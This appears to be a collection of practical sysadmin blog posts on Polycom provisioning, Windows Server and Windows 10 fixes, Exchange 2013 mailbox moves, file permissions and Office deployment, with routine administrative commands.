4-change all the files at once: sed -i -e "s/3.2.3/4.0.11/g" ./000*.cfg
This will update all the base-config files to tell the phone-sets to use the new bootrom/updater files.

PHONE OVERRIDE FILES
Phone override files are changes made from the phone-set and are named <MAC Address>-phone.cfg.
So something like, 0004123EDT78-phone.cfg
On my phone-server, the older phone override files were named phone-0004123EDT78.cfg
If they have parameters older than v3.3.0, you will get an error message. To fix, see below in the "UPDATE CONFIG FILE WITH UTILITY" section.

WEB OVERRIDE FILES
If you change something via the phone-set web interface, it will save the settings in a web-override file named <MAC Address>-web.cfg. So something like, 0004123EDT78-web.cfg

UPDATE CONFIG FILE WITH UTILITY
If you have an older config file, the Polycom phone-set will give an error. Something like, "phone-0004123EDT78.cfg is pre-3.3.0 params." Basically it is saying that you are trying to config a parameter that doesn't exist. Consequently, you will have to update your config files to remove those parameters with a software utility called CFCUtility:
http://support.polycom.com/PolycomService/support/us/support/eula/ucs/UCConfig_agreement.html
Once you download and unzip, you will have to convert the config-files.
-make sure you are in the tftpboot directory.
-make a backup directory: mkdir cfgphonefiles
-copy all the phone files to this directory: cp ./phone-* ./cfgphonefiles/
-on a Windows system, in the CFCUtility folder, create a folder called "files".
-gather all the config-files in the folder called "files". (this can be done by mounting, ftp, scp, etc)
-from a Windows command-line change to the cfcutility folder
-type: cfcUtility.exe -t ./files
-it will ask you some generic questions; accept the defaults.
-now transfer the files back to the phone-server in the tftpboot directory.
-reboot the phone(s). (remember, if you have a POE switch, unplug the switch and plug back in for a network-wide solution)
-it will reboot 2 or 3 times on its own.

SUMMARY
In the tftpboot directory, you will have some files for each phone-set:
0004123EDT78.cfg (the updated base config.
The backup is in the cfgfiles directory)
0004123EDT78-directory.xml
0004123EDT78-phone.cfg (the new phone override, used automatically)
0004123EDT78-web.cfg (the new web override, used automatically)
phone-0004123EDT78.cfg (the old phone override, used by the base-config file. This file is converted and a backup is in the cfgphonefiles directory)

For newer phone-sets with updated firmware versions, simply redirect the provisioning server to: voipt2.polycom.com/<version-number>
1. go to phone
3. change Server Type to HTTP.
4. type: voipt2.polycom.com (for Server Address)
• Example: to load the latest SIP 4.04 = voipt2.polycom.com/404
• Example: to load the latest SIP 4.0.11 = voipt2.polycom.com/4011
5. reboot the phone-set
6. wait 15 minutes
7. once updated, change the server back to the local provisioning-server
For a current live directory list go here: http://voipt2.polycom.com/WEBCONTENT/directory.html
NOTES:
-the config files are explained here: http://documents.polycom.com/topics/139356

Update the ADMX Templates in Windows Server to Apply GPO to Windows 10
Updating the ADMX Templates in Windows Server to Apply GPO to Windows 10 is a manual process. A Windows Server can control Windows client computers through Group Policy/Group Policy Objects (GP/GPO). It does this through template files called ADMX files. These ADMX files simply correspond to registry-edits (regedits). Since not all regedits are available on all OS versions (for example, controlling OneDrive was included along the way), there is a set of ADMX files for common milestones like:
• -Windows 7
• -Windows 7 SP1
• -Windows 8
• -Windows 8.1
• -Windows 10
• -Windows 10 (1511)
• -Windows 10 (1607) Anniversary Update
The ADMX files are not automatically updated on the Windows Server. They must be manually updated. The updates are in MSI files (and not zipped files).
The instructions are pretty simple once someone shows you:
• -install the ADMX msi (this will unpack the ADMX files in a folder called "Policy Definitions").
• -copy the entire contents to: C:\Windows\SYSVOL\sysvol\domain-name\Policies\PolicyDefinitions\
You can find the ADMX files here:
-Windows 10 (1511)
-Windows 10 (1607) Anniversary Update
This video explains it better than I can:

Creating Shares On Server 2012
Many experienced admins get this wrong. Here's how to do it right. There are 5 parts to this.

CREATE THE GROUP
• -click ACTIVE-DIRECTORY-USERS-AND-COMPUTERS.
• -create a GROUP (aka SECURITY-GROUP).

CREATE THE SHARE
• -create a folder.
• -right-click to PROPERTIES > SHARING.
• -checkmark SHARE-THIS-FOLDER.
• -if hidden, add a $ at the end.

ADD SHARE PERMISSIONS
• -click PERMISSIONS.
• -remove all groups/users.
• -add the GROUP required for this share.
• -checkmark FULL-CONTROL.
• -click OK > OK.

ADD NTFS PERMISSIONS
• -click SECURITY tab (at the top).
• -click ADVANCED (at the bottom).
• -click DISABLE INHERITANCE.
• -click CONVERT INHERITED PERMISSIONS INTO EXPLICIT PERMISSIONS.
• -remove all groups/users except SYSTEM.
• -add the GROUP required for this share.
• -checkmark FULL-CONTROL.
• -click OK > APPLY.

TEST PERMISSIONS
• -click the EFFECTIVE ACCESS tab (at the top).
• -test the user/group you want to make sure can access.

NOTES:
• -the EVERYONE group does not include everyone. This is why it should not be used.
• -the most restrictive permissions win.
• -the group is assigned to the user upon login. Consequently, the user will have to logout and login again to test if the share is working.

Find the FSMO in Your Domain
You have multiple servers. Despite there being a sync between them, only one can be the master for certain operations. For example, only one server can hold the official invitation list. The other bouncers will have to check the master list. This master is called the FSMO. So how do you know which server is the FSMO?
How do you find the FSMO in your domain? Here's how:
• open cmd
• type: netdom query fsmo
You can also:
• -open ACTIVE-DIRECTORY-USERS-AND-COMPUTERS.
• -right-click on the domain-name (on the left-hand side).
• -click OPERATIONS MASTER.
• -it should show you there as well. At the different tabs at the top, you can select which OPERATION you are interested in.
There are other ways as well.

Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update)
Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) upon reboot. The only way to get out of it is to power down the computer. Upon reboot, the computer will revert to the previous version of Windows 10, v1511. So how do you get Windows 10 v1607 Update (aka Anniversary Update) to install?
-start the update.
-manually reboot to finish.
-before it reboots, unplug the USB dongle for the Logitech wireless mouse or wireless keyboard.
-the update will install.

Intel HD Graphics on Windows 10 64-bit
In the spirit of "just show me how to fix it" I will be succinct. The older Intel HD Graphics 3000 (or Sandy Bridge) is no longer working in WINDOWS-10(v1607). It used to work in WINDOWS-10(v1511) but INTEL is pushing forward. The same is true for Intel HD Graphics 2000 and HD Graphics. This is basically the Intel 6 Series chipset generation.
-Intel refuses to produce drivers for this graphics card on its own but has released a driver and provided it to MS.
-the driver is version 9.17.10.4459.
-the driver has to be gotten from MS and not from INTEL: http://catalog.update.microsoft.com/v7/site/Search.aspx?q=9.17.10.4459 (it is named: 200028694_9f1eae50bc588760715acd70172f5487dc461e64)

CASE-1
-INTEL GRAPHICS HD 3000
-black screen of death trying to update to WIN-v1607.
-the driver was v9.17.10.4299.
-had to manually untar the cab.
-had to manually update the driver to v9.17.10.4459
-also installed the latest CHIPSET driver for QM67 (intel 6 series).
CASE-2
-INTEL GRAPHICS HD 2000
-black screen of death trying to update to WIN-v1607.
-the driver was v9.17.10.4299.
-had to manually untar the cab.
-had to manually update the driver to v9.17.10.4459
-also installed the latest CHIPSET driver for Q65 (intel 6 series).

CASE-3
-INTEL GMA 4500 (g41 chipset)
-black screen of death trying to update to WIN-v1607.
-the driver is v8.15.10.2702
-make sure KB3176938 is installed.

NOTES:
-use HWINFO to find out details of your computer.
-https://en.wikipedia.org/wiki/List_of_Intel_graphics_processing_units
-https://en.wikipedia.org/wiki/List_of_Intel_chipsets

Office365 Options
Office365 has many options and it can be confusing on their web site. Here's an easy-to-read all-in-one page to quickly identify your needs:

PLAN                   MONTHLY  ANNUAL   EXCHANGE  MAILBOX    APPS-ONLINE  APPS-DESKTOP  ONEDRIVE   SHARED-CONTACTS  SHARED-CALENDAR  MAX-USERS
EXCHANGE-1             $4.00    $48.00   YES       50GB       NO           NO            NO (0TB)   YES              YES              UNLIMITED
EXCHANGE-2             $8.00    $96.00   YES       100GB      NO           NO            NO (0TB)   YES              YES              UNLIMITED
OFFICE-365-ESSENTIALS  $5.00    $60.00   YES       50GB       YES          NO            YES (1TB)  YES              YES              300
OFFICE-365-BUSINESS    $8.25    $99.00   NO        0GB        YES          YES           YES (1TB)  NO               NO               300
OFFICE-365-PREMIUM     $12.50   $150.00  YES       50GB       YES          YES           YES (1TB)  YES              YES              300
OFFICE-365-PROPLUS     $12.00   $144.00  NO        0GB        YES          YES           YES (1TB)  NO               NO               UNLIMITED
OFFICE-365-E1          $8.00    $96.00   YES       UNLIMITED  YES          NO            YES (1TB)  YES              YES              UNLIMITED
OFFICE-365-E3          $20.00   $240.00  YES       UNLIMITED  YES          YES           YES (1TB)  YES              YES              UNLIMITED
OFFICE-365-E5          $35.00   $420.00  YES       UNLIMITED  YES          YES           YES (1TB)  YES              YES              UNLIMITED

NOTES:

Exchange 2013 Change Primary SMTP Email Address
You might get the following, "Couldn't update the primary SMTP address because this mailbox is configured to use an e-mail address policy." Here's how to fix:
Set-Mailbox foo.user -PrimarySmtpAddress foo.user@domain1 -EmailAddressPolicyEnabled $false
Or if you need to set all the addresses for one mailbox all at once (the capital SMTP is the primary smtp address and the lowercase smtp entries are the additional smtp email addresses):
Set-Mailbox foo.user -EmailAddresses smtp:foo.user@domain1, smtp:foo.user@domain2, SMTP:foo.user@domain3 -EmailAddressPolicyEnabled $false

Grab All The Photos From A Web Site
So you want to grab all the photos from a web site do you? Here's how:
wget -nd -r -A jpg -e robots=off http://wherever.tld
This will put all the photos from the web site you reference (and all lower directories) into a single directory. This will not magically grab photos from a directory which has no page attached to it and has random names. If you do know the names are sequential numbers then you can try:
wget -nd -r -A jpg -e robots=off http://wherever.tld/gallery/{0..1000}.jpg

Create a ZIP File in Linux
Create a ZIP file in Linux. This will create a ZIP file called foo.zip that contains all of the documents in the current directory.
zip foo.zip ./*

Exchange 2013 Move Mailbox From One Database to Another Database
Here's the command to move a mailbox from one database to another database:
New-MoveRequest foo.user -TargetDatabase "Mailbox XYZ"
Here's how to do a batch based on last name letter:
Get-mailbox -Database "Mailbox-Foo1" -ResultSize Unlimited |get-recipient -RecipientType UserMailbox -Filter {lastname -like 'h*'} |get-mailbox |New-MoveRequest -TargetDatabase "Mailbox-Foo2" -BatchName "Foo-batch"
Here is the diagnostic short list:
get-moverequest
get-moverequeststatistics
remove-moverequest foo.user
(get-moverequest).count

SPEED TWEAKS ON HOW TO MOVE MAILBOXES FASTER
I have found that moves are slow unless they are set as EMERGENCY. Here's how:
set-MoveRequest foo.user -priority emergency
Also, some have found that turning off the MRS (throttling) improves performance. I haven't tried it.
Here's how:
reg query "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS
:: TURN OFF MRS
echo y | reg add "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 0
:: STOP EXCHANGE REPLICATION SERVICE
sc stop MSExchangeRepl
:: TURN ON MRS
echo y | reg add "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 1
:: START EXCHANGE REPLICATION SERVICE
sc start MSExchangeRepl

SEE WHAT'S HAPPENING
Here's how to see the full list:
Get-moverequest |get-moverequeststatistics |sort-object -Property PercentComplete -descending
Here's how to see how many have finished:
(Get-MoveRequest -movestatus completed).count
Here's how to see how many are in progress:
(Get-MoveRequest -movestatus inprogress).count
Here's how to see how the normal-moves are going:
Get-moverequest -movestatus inprogress |get-moverequeststatistics |sort-object -Property PercentComplete -descending
Here's how to see how the emergency-moves are going:
Get-moverequest -movestatus inprogress -flags highpriority |get-moverequeststatistics |sort-object -Property PercentComplete -descending

WHAT TO DO WITH "FAILED" MOVES
If move requests fail, you can see why. Here's how:
get-moverequeststatistics -includereport foo.user |fl
Usually it's a single bad item. You can raise the bad-item limit just a little and restart the move with the following:
get-moverequest foo.user |set-moverequest -baditemlimit 10 -priority emergency
resume-moverequest foo.user

EXCHANGE 2013 Mailflow Stops After Update is Cancelled
I cancelled an EXCHANGE update (CU13) because it requires a HOTFIX (or two) before it continues. Afterwards, OUTLOOKs are disconnected; OUTLOOK-WEB-ACCESS works; sending & receiving email doesn't work. Hmmmm.... what to do.
Checking the WINDOWS logs and I see: "Failed to discover Ews Url for mailbox"
Then I check for the EXCHANGE COMPONENT STATUS:
• Get-ServerComponentState -Identity ServerNameHere
This will tell you the state of the server components in an ACTIVE/INACTIVE way. If something is INACTIVE, you can turn it to ACTIVE by:
• Set-ServerComponentState -Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Functional
• sc stop MSExchangeTransport
• sc stop MSExchangeFrontEndTransport
• timeout 80
• sc start MSExchangeTransport
• sc start MSExchangeFrontEndTransport
It should turn back to ACTIVE. However, if there was a second REQUESTER making the change to INACTIVE, this REQUESTER must also set it to ACTIVE for the whole status to be ACTIVE:
• Set-ServerComponentState -Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Maintenance
• sc stop MSExchangeTransport
• sc stop MSExchangeFrontEndTransport
• timeout 80
• sc start MSExchangeTransport
• sc start MSExchangeFrontEndTransport
Another way to fix this is to install the HOTFIXES that are needed and then proceed with the EXCHANGE update. Wait about an hour or so and voila! Working server, automatically. Apparently, the EXCHANGE update automatically turns off some of the components. If the update is canceled, these components are left in the INACTIVE state. Going through the update process turns the components to the ACTIVE state automatically.

NOTES:
-https://blogs.technet.microsoft.com/exchange/2013/09/26/server-component-states-in-exchange-2013/
-google: "Failed to discover Ews Url for mailbox"
-google: "ServerWideOffline"
-to test mail flow use: Test-Mailflow -TargetEmailAddress foo.user@domain.tld

How to Enable DOTNET 3.5 on Windows 10

BACKGROUND
DOTNET is a computer language. If it is installed on you, you can speak it and understand it. DOTNET is to MICROSOFT what JAVA is to SUN/ORACLE.
There are certain versions of DOTNET that automatically come with certain versions of WINDOWS. They are as follows:

DOTNET VERSION         DATE      WINDOWS VERSION
1.0.0                  02/13/02  XP
1.1.0                  04/24/03  N/A
2.0.0                  11/07/05  N/A
3.0.0                  11/06/06  Vista
3.5.0                  11/19/07  7
4.0.0                  04/12/10  N/A
4.5.0 (378389)         08/15/12  8
4.5.1 (378675/378758)  10/17/13  8.1
4.5.2 (379893)         05/05/14  N/A
4.6.0 (393295)         07/20/15  10
4.6.1 (394254)         11/30/15  10 v1511 (November Update)
4.6.2 (394802)         08/02/16  10 v1607 (Anniversary Update)
4.7.0 (460798)         04/11/17  10 v1703 (Creators Update)
4.7.1 (461308)         10/17/17  10 v1709 (Fall Creators Update)

DOTNET can be installed in parallel with other versions. For example, v3.5 can be installed with v4.0. Certain versions of DOTNET are required for certain software to run. If something is built to run off of v3.5, this doesn't mean it will work with v4.6.2. Starting with WINDOWS 10, DOTNET v4.6.0 is included. DOTNET v3.5 (including v2 & v1) is included in WINDOWS 10 as a "feature" but it is not installed/enabled.

TO SEE IF DOTNET 3.5 (v2 & v1) IS INSTALLED ON WINDOWS 10
• -click START > RUN
• -type: cmd
• -type: DISM /Online /get-features /Format:Table
This will list out all the features of WINDOWS 10 and their status. You are looking for NETFX3. This is DOTNET v3.5 (v2 & v1).

ENABLE DOTNET v3.5 (v2 & v1)
If it is not enabled, you will need to enable it.
• -click START > RUN
• -type: cmd
• -type: DISM /Online /Enable-Feature /FeatureName:NetFx3 /All
Or for an OFFLINE installation where you have the source CD/DVD/USB/WIM:
• DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:c:\path\to\Windows10x64\sources\sxs

FIND DOTNET VERSION
To find the DOTNET version:
• -type: Get-ChildItem "hklm:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\"
or
• -type: reg query "hklm\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v Release
This will give the value in HEX. You have to convert the HEX number to DEC.
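Converting by hand is error-prone; any POSIX shell can do it for you. A quick sketch (the 0x60632 value is just the 4.6.2 entry from the chart above, which I'm using as the example):

```shell
# Convert a .NET "Release" registry value from HEX to DEC.
# 0x60632 is the Release value for 4.6.2 (= 394802 in the chart above).
printf '%d\n' 0x60632   # prints 394802
```

Look the decimal result up in the chart to get the version name.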
This will give a RELEASE value that corresponds to a VERSION number. See the chart above.

WINDOWS PERMISSIONS WITH ICACLS
When permissions in WINDOWS are FUBAR'd, start from scratch by resetting the permissions as they would be if nothing had changed.

RESET PERMS FOR DIR RECURSIVELY
icacls folder-name-here /t /reset

Now, from this point, if you would like to add a USERNAME or GROUPNAME:

ADD FULL PERMS FOR DIR RECURSIVELY (doesn't change existing)
icacls folder-name-here /grant username-or-groupname:f /t

If you want to set permissions explicitly as you tell it to:

REMOVE INHERITANCE | GRANT USERNAME | (CI) ENSURES NEW ITEMS WILL HAVE THESE PERMS (changes everything from scratch)
icacls foo-folder /inheritance:r /grant username:(ci)f /t

EXAMPLE (This is probably what you want. The SYSTEM, OWNER, and ADMINISTRATORS all have FULL CONTROL. The USERNAME has READ-ONLY CONTROL).
icacls foo-dir /inheritance:r /grant "creator owner":(OI)(CI)F system:(OI)(CI)F administrators:(OI)(CI)F other-username-for-full-control:(OI)(CI)F other-groupname-for-read-control:(OI)(CI)RX /T

BONUS: If you need to take ownership beforehand, you can do so by the following:
takeown /f top-folder-name /r /d y
or:
takeown /f "c:\foo folder" /r /d y

How To Find .Net Version Installed | How To Find the Powershell Version Installed
To find the .Net version installed on your computer or the Powershell version installed on your computer:
• -open POWERSHELL
• -type: $PSVersionTable
The CLRVersion is the .NET version as a "version name." If you want to know what it is in "product name," type it into google. The PSVersion is the Powershell version installed.

How to Checksum Files in Windows 10
There are a few ways to CheckSum files in Windows 10 listed in the great wide open of the internet.
They are as follows:
fciv (outdated, from 2004)
fciv -md5 d:\programs\setup.exe
certutil (built into Windows)
CertUtil -hashfile C:\TEMP\MyDataFile.img MD5
get-filehash (built into PowerShell v4 and higher)
get-filehash -algorithm md5 <file_to_check>
other tools
There are other tools out there but I prefer to stick with what's built into the OS and released/blessed by the OS author.

Access RAPIDSSL Certificates
To access your RAPIDSSL certificates or your GEOTRUST certificates, you can login to their END USER PORTAL here:
This is kinda hidden since typically RAPIDSSL only sells to resellers and pushes all support through them, so I'm making a note of it.

SQL Server 2014 High CPU After Installing SP2
There are 3 steps I used to fix this:

STEP 1: find the username of the SQL instance
• -open "SQL Server 2014 Configuration Manager."
• -right-click on the instance of SQL that you are running.
• -click PROPERTIES (a box opens).
• -click LOG-ON tab (at the top).
• -take note of the USERNAME that is running.
• -click OK
• -exit out of "SQL Server 2014 Configuration Manager."

STEP 2: add the username to the LOCK PAGES IN MEMORY section
• -click START > RUN
• -type: gpedit.msc
• -click COMPUTER-CONFIGURATION > WINDOWS-SETTINGS > SECURITY-SETTINGS > LOCAL-POLICIES > USER-RIGHTS-ASSIGNMENT
• -find LOCK-PAGES-IN-MEMORY
• -type in the USERNAME from above.

STEP 3: adjust the MAX MEMORY
• -open the 2014 MANAGEMENT STUDIO
• -login to the SQL DATABASE you are running.
• -right-click the SQL DATABASE name (at the top, on the left-hand side)
• -click PROPERTIES
• -click MEMORY (on the left-hand side).
• -you will see the MINIMUM SERVER MEMORY and the MAXIMUM SERVER MEMORY areas.
• -leave the MINIMUM SERVER MEMORY at 0 (zero).
• -find the MAXIMUM SERVER MEMORY box.
• -type in the number for your server. This number is based on the amount of RAM in your system.
• -the chart is here: https://www.brentozar.com/blitz/max-memory/
• -click OK.
That's it!!! You did it!!!

Windows 10 Product Key
slmgr /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
Of course, replace your product key here. This didn't work for me for some reason. I had to go the traditional GUI route and that worked. Same product key.

WOL Control
Waking remote computers with WOL. As usual, the options are dizzying. Here's a cheat sheet.
See what's capable:
powercfg -devicequery wake_from_any
But this list is too long. Since not all devices can be config'd, some devices are going to wake whether the user wants them to or not. So to see what's capable of being user config'd (what can be changed):
powercfg -devicequery wake_programmable
See what's enabled:
powercfg -devicequery wake_armed
And finally, to enable a device to be a waking point:
POWERCFG -deviceenablewake "exact device name here"
A quick batch script would be:
POWERCFG -devicequery wake_from_any | FINDSTR /i "net" > c:\foo\adapters.txt
FOR /F "tokens=*" %%i IN (c:\foo\adapters.txt) DO POWERCFG -deviceenablewake "%%i"

Manage Printers via Command Line
Manage printers via command line:
• Get the default printer details from command line:
wmic printer where default='TRUE' get name
• Get the list of printers added to the system from Windows command line:
wmic printer get name,default
• Set default printer from windows command line:
rundll32 printui.dll,PrintUIEntry /y /n "exact printer name here"

Install Windows 10 In-Place Upgrade on All Computers in a Domain With PDQ Deploy
Installing the Windows 10 in-place upgrade across a domain is possible in a couple of ways. The official way is to use the MICROSOFT DEPLOYMENT TOOLKIT found here: https://technet.microsoft.com/en-us/windows/dn475741.aspx
The other way is through a simple network share. Wait... what? Yes, network share.

STEP 1: download the WINDOWS 10 ISO
• -you will see 4 options
WINDOWS 10 (all languages)
WINDOWS 10 K (Korean law)
WINDOWS 10 N (European law)
WINDOWS 10 SINGLE LANGUAGE (1 language only)
• -simply download the one you need. The one that matches what you have now, which is probably WINDOWS 10 ALL LANGUAGES.
• -again, since you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now.
Many of the issues people are having come from trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE ISO when they have WINDOWS 7 ALL LANGUAGES installed on their machine.

• NOTE: do NOT use the MEDIA-CREATION-TOOL for this exercise.

STEP 2: mount the WINDOWS 10 ISO

This means show the files that are in the ISO. Windows 7 cannot do this without some help such as WINRAR, 7ZIP or VIRTUAL-CLONEDRIVE. WINDOWS SERVER 2012, WINDOWS 8.1 and newer can do this without additional software. This can happen either through the GUI or through the POWERSHELL command MOUNT-DISKIMAGE. There is no one correct way to mount the ISO, just do it.

STEP 3: create the network share

Create the folder (then share it):
• md C:\installs\os\win10x64\unpack

STEP 4: copy the ISO contents onto the created network share.

I use ROBOCOPY to do this. It is built into WINDOWS 7 and newer. Something like:
• robocopy /e f:\ C:\installs\os\win10x64\unpack

STEP 5: build your install package

Pretty easy when you know how to do it right.
• -select the setup.exe on the network share. Something like: \\myserver\installs\os\win10x64\unpack\setup.exe
• -type in the parameters: /auto upgrade /Compat IgnoreWarning /installfrom c:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\sources\install.wim /dynamicupdate disable /showoobe none /quiet

NOTE: if you would like, you can save the log files as well. Add the following to the end of the parameters above: /copylogs \\myserver\installs\os\win10x64\logs

• -checkmark "Include Entire Directory"
• click PACKAGE PROPERTIES
• make sure the COPY MODE is changed to PULL (not PUSH).
• checkmark "use custom timeout" and change the number to 240.
• save the package.

STEP 6: deploy on a test victim.

That should do it!!! If the test pc works, deploy to the rest of the pc's how you see fit.
==============================================================

If for some reason the above PDQ package fails, you can create a .bat file and fill it with the following (adjust as necessary):

:: MAKE DIRECTORY.
md c:\installs\Windows10x64
:: COPY FILES.
robocopy /MIR \\myserver\installs\os\win10x64\unpack\ c:\installs\Windows10x64
:: CHANGE DIRECTORY.
cd c:\installs\Windows10x64
:: START THE IN-PLACE UPGRADE (OR CLEAN INSTALL).
start /wait setup.exe /auto upgrade /Compat IgnoreWarning /installfrom c:\installs\Windows10x64\sources\install.wim /dynamicupdate disable /showoobe none /quiet

• Save this .bat in \\myserver\installs\os\win10x64\unpack\
• Then create a PDQ package with this bat.
• Deploy as you see fit.

Office 2010 "You don't have permission to open this file."

You also might get, "filename.xls could not be found."

-disable Panda's DATA SHIELD. Panda's free cloud antivirus has a new component called DATA SHIELD. Disable the DATA SHIELD and it will fix the issue.

Automatically Install Office 2016 to Domain Network

• -mount ISO.
• -copy contents to network share.
• -config (product key, org name, etc).
• -click FILE SAVE.
• -save the MSP file at the network share.

This will automatically deploy OFFICE 2016 to domain PC's of your choosing. And it's completely silent. This process is how network administration should be done! Not "proof of concept" stuff along with long-winded instruction sets.

HDMI Cable Speeds

2160/60p, 4:2:0, 8-bit, 8.91Gbps
2160/60p, 4:2:0, 10-bit, 11.14Gbps
2160/60p, 4:2:0, 12-bit, 13.37Gbps
2160/60p, 4:2:0, 16-bit, 17.82Gbps
2160/60p, 4:2:2, 8-, 10- or 12-bit, 17.82Gbps
2160/60p, 4:4:4, 8-bit, 17.82Gbps
4320/60p, 4:4:4, 12-bit, ~72Gbps

HDMI CERTIFICATE TYPES
Standard (or "category 1"), no Ethernet;
High Speed (or "category 2"), no Ethernet;
Standard, with Ethernet;
High Speed, with Ethernet;

Full Disclosure: I have an AudioQuest cable.
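The 2160/60p numbers in the table are easy to sanity-check. Assuming HDMI's TMDS encoding (8b/10b, a 1.25x overhead) and the CTA-861 total frame timing of 4400 x 2250 for a 3840x2160@60 signal, a rough sketch:

```python
# Rough bandwidth check for the table above. Assumptions: TMDS 8b/10b
# overhead (x1.25) and a 4400 x 2250 total frame (blanking included)
# for 2160/60p, per CTA-861 timing.
def hdmi_gbps(bits_per_pixel, h_total=4400, v_total=2250, fps=60):
    return h_total * v_total * fps * bits_per_pixel * 1.25 / 1e9

print(round(hdmi_gbps(24), 2))  # 4:4:4, 8-bit  -> 17.82
print(round(hdmi_gbps(12), 2))  # 4:2:0, 8-bit  -> 8.91
print(round(hdmi_gbps(15), 2))  # 4:2:0, 10-bit -> 11.14
```

As I understand it, 4:2:2 rides in a fixed 24-bit-per-pixel container on the link regardless of bit depth, which is why the 8-, 10- and 12-bit 4:2:2 rows all share the 17.82Gbps figure.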
Picked it up at a conference as a freebie ;-)

ErrorCode: 1603(0x643) | Office 2010 Won't Install on Windows 10 | CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057

WINDOWS 10 is having trouble installing software. This is a complex issue, but basically some software won't install (or updates won't install) because of an ERROR 1603. More specifically: ErrorCode: 1603(0x643). Turning on VERBOSE logging for the install (check another article, but it puts the logs in %user%\appdata\local\temp), it shows that the actual error is: CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057. Hmmm... What to do?

• -click START > RUN > REGEDIT
• -navigate to: hkey_local_machine/software/microsoft/windows nt/currentversion/profilelist

Nested underneath, you will see SID's. Something like:
• s-1-5-18
• s-1-5-19
• s-1-5-20
• s-1-5-21-...1000
• s-1-5-21-...1003
• s-1-5-82

To see which SID's correspond to actual accounts:
• -type: wmic useraccount get name,sid

You'll see something like:
• 1000 owner
• 1003 tempfix

Notice that s-1-5-18, s-1-5-19, s-1-5-20 do not show. So what's up? Well, this is because these are system accounts that are not normally seen. These are the ones we are concerned with. They are as follows:
• s-1-5-18 is SYSTEM
• s-1-5-19 is LOCAL SERVICE
• s-1-5-20 is NETWORK SERVICE

Next, go back to regedit, to: hkey_users

A DEFAULT NORMAL INSTALL has something like:
• s-1-5-18
• s-1-5-19
• s-1-5-20
• s-1-5-21-...1215
• s-1-5-21-...1216
• s-1-5-21-...1217

What we are seeing is that some of the upgrades to WINDOWS 10 are BROKEN and have the following:
• s-1-5-18
• s-1-5-19
• s-1-5-21-...1000
• s-1-5-21-...1003

So, it is missing s-1-5-20.
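The diagnosis above boils down to checking HKEY_USERS against the three well-known service-account SIDs. A little sketch — the helper and the sample list are made up for illustration, only the SID names come from the article:

```python
# Hypothetical helper: given the SIDs listed under HKEY_USERS, report
# which well-known service-account SIDs (named above) are missing.
WELL_KNOWN = {
    "S-1-5-18": "SYSTEM",
    "S-1-5-19": "LOCAL SERVICE",
    "S-1-5-20": "NETWORK SERVICE",
}

def missing_service_sids(hkey_users_sids):
    present = {sid.upper() for sid in hkey_users_sids}
    return sorted(s for s in WELL_KNOWN if s not in present)

# Sample from a broken upgrade, per the article:
broken = ["s-1-5-18", "s-1-5-19", "s-1-5-21-...1000", "s-1-5-21-...1003"]
print(missing_service_sids(broken))  # ['S-1-5-20']
```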
Here's how to fix:
• -start > all-programs > accessories
• -right-click COMMAND-PROMPT > run-as-administrator
• -type: ren C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT *.OLD
• -xcopy /h "C:\Users\Default\NTUSER.DAT" "C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT"
• -in explorer, travel to C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
• -right-click > properties > security > edit > add
• -type: NETWORK SERVICE
• -give NETWORK SERVICE full-control
• -reboot

Now, upon reboot, open REGEDIT again and go to HKEY_USERS. You should now see that s-1-5-20 is added back in. Let's add the correct permissions:
• -right-click on S-1-5-20 > PERMISSIONS > ADD
• -type: network service
• -click OK
• -checkmark FULL CONTROL
• -click OK

I do not have a good explanation of why this happens. It could be a corrupt file. It could be a failed upgrade. It could be some type of antivirus. I do not know. What I know is that this took a few days to figure out and the software will now install successfully!!!!

Let's say that you have an OFFICE 2010 install that doesn't work. You cannot uninstall it either. Nor do you have a CD/USB/SOURCE to install from, because it was on your computer when you bought it and you just used a PRODUCT KEY. What do you do?

NOTE: !!!Make sure you have your PRODUCT KEY!!! You can get this with BELARC-ADVISOR (among many others).

1 - UNINSTALL OFFICE
You can uninstall Office by using the automatic uninstall tool here: 2013 | 2016 http://support.microsoft.com/kb/2739501

2 - DOWNLOAD OFFICE
• -download the Office 2010 installer that matches your PRODUCT KEY (for example: office_hs_2010_english_x32.exe)

3 - EXTRACT OFFICE
• -run COMMAND PROMPT (as administrator)
• -office_hs_2010_english_x32.exe /extract:c:\office2010

4 - INSTALL OFFICE
• -right-click on setup.exe

[Solved] Your PC Ran Into A Problem And Needs To Restart Windows 10 Loop

"Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop! or "Your PC did not start correctly"

Collectively, let's all say "Arrrrrrrrrrrrrrrrgh!!!" This is the stuff that I really dread for the average person.
How in the world is a normal person supposed to be able to get through an issue like this? There are 10 possible repairs for this loop (and possibly more):
• 1-startup repair
• 2-checkdisk
• 3-system restore
• 4-safe boot / low res
• 5-sfc
• 6-windowsapps folder
• 7-registry repair
• 8-boot repair
• 9-dism
• 10-reload and transfer

ISSUE 1 - There is a startup problem (startup repair).
• -click TROUBLESHOOT.
• -click STARTUP REPAIR.
• -let it go through its process and restart.

ISSUE 2 - There is a filesystem problem (checkdisk).
• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: chkdsk d: /f /r
• (note: depending on what your OS drive letter is, this could be: chkdsk c: /f /r)
• -let it go through its process and restart.

ISSUE 3 - System Restore
• -click TROUBLESHOOT.
• -click SYSTEM RESTORE.
